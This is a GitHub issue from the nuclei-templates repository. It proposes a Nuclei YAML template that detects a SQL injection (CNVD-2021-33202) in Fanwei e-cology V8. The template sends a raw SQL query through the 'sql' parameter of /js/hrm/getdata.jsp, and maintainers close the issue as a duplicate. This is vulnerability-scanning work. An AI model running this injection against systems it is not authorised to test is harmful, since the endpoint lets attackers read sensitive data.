search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.38k stars 2.66k forks source link

CNVD-2021-33202 fanwei e-cology V8 sq injection #5212

Closed loulan-ling closed 7 months ago

loulan-ling commented 2 years ago 
id: CNVD-2021-33202

info:
  name: Fanwei e-cology V8 Sqljection
  author: ling
  description: There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
  severity: high
  reference:
    - https://www.cnblogs.com/0day-li/p/14637680.html
  classification:
    cvss-metrics: CVSS:3.0AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cwe-id: CWE-89
  tags: fanwei,cnvd,cnvd2021,sqljection

requests:
  - method: GET
    path:
      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "1234"

      - type: status
        status:
        - 200
tess-ss commented 2 years ago

Hi @loulan-ling

Thank you for taking time and contributing to Nuclei :)

Can you please share multiple reference for this issue? and also the debug data so we can verify the template, please?

Thanks, @tess-ss

DhiyaneshGeek commented 7 months ago

Hi @loulan-ling , we have a template for this http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml, so we are closing this issue

Thanks